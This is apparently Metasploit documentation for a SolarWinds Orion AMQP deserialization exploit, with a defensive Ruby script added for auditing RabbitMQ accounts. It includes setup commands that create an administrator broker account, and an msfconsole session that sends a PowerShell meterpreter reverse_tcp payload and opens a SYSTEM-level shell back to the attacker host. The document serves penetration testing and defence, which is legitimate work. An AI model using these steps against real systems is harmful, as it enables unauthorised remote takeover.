
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/solarwinds_amqp_deserialization.md

Vulnerable Application

The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

Verification Steps

  1. Install the application (tested SolarWinds Orion NPM versions 2020.2.5 and 2020.2.6)

    1. After installation is complete, create an AMQP account so you know the credentials. The default account is orion.

    2. Open a command prompt in C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>

    3. Run: .\rabbitmqctl.bat add_user "hax" "Password1!"

    4. Run: .\rabbitmqctl.bat set_permissions hax .* .* .*

    5. Run: .\rabbitmqctl.bat set_user_tags hax administrator

  2. Start msfconsole

  3. Do: use exploit/windows/misc/solarwinds_amqp_deserialization

  4. Set the RHOSTS, USERNAME, PASSWORD, PAYLOAD and payload-related options

  5. Do: run

  6. You should get a shell.
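The exploit only works for a client that can authenticate to the broker, so the defensive counterpart to the verification steps above is auditing which RabbitMQ accounts can publish into the SWIS queue. The following is an added example, not code from the Metasploit module or its documentation; it assumes the tab-separated table output of `rabbitmqctl list_users` and `rabbitmqctl list_permissions`, and the sample output it parses is constructed to mirror the `hax` account created above.

```ruby
# Added example, not code from the Metasploit module or its documentation.
# Audits which RabbitMQ accounts could authenticate and publish into the
# SWIS AMQP queue, the precondition the deserialization attack relies on.
# Assumes the tab-separated output format of `rabbitmqctl list_users`
# and `rabbitmqctl list_permissions` (RabbitMQ 3.x).

# Constructed sample output modelled on the verification steps; not a real capture.
LIST_USERS = <<~OUT
  Listing users ...
  user\ttags
  orion\t[administrator]
  hax\t[administrator]
  monitor\t[]
OUT

LIST_PERMISSIONS = <<~OUT
  Listing permissions for vhost "/" ...
  user\tconfigure\twrite\tread
  orion\t.*\t.*\t.*
  hax\t.*\t.*\t.*
  monitor\t^$\t^$\t^swis\\..*$
OUT

# Splits rabbitmqctl table output into rows of fields, dropping the
# "Listing ..." banner and the column-header row.
def parse_table(output)
  output.lines.map(&:chomp).reject(&:empty?)
        .reject { |l| l.start_with?('Listing ') }
        .map { |l| l.split("\t") }
        .reject { |fields| fields.first == 'user' }
end

# Returns [user, reason] findings for every account outside the allowlist,
# noting administrator tags and unrestricted (.*) write permission; either
# lets the account publish arbitrary messages to the SWIS queue.
def audit_amqp_accounts(users_out, perms_out, allowlist: ['orion'])
  findings = []
  parse_table(users_out).each do |user, tags|
    next if allowlist.include?(user)
    findings << [user, 'account not in allowlist']
    findings << [user, 'administrator tag'] if tags.include?('administrator')
  end
  parse_table(perms_out).each do |user, _configure, write, _read|
    next if allowlist.include?(user)
    findings << [user, 'unrestricted write permission'] if write == '.*'
  end
  findings
end

audit_amqp_accounts(LIST_USERS, LIST_PERMISSIONS).each { |u, r| puts "#{u}: #{r}" } if __FILE__ == $PROGRAM_NAME
```

On a live host, feed the script the output of the two `rabbitmqctl.bat` commands from the `sbin` directory named above; any account beyond the expected service account should be removed or restricted to the queues it actually needs.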

Options

Scenarios

SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64

```
msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run
[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >
```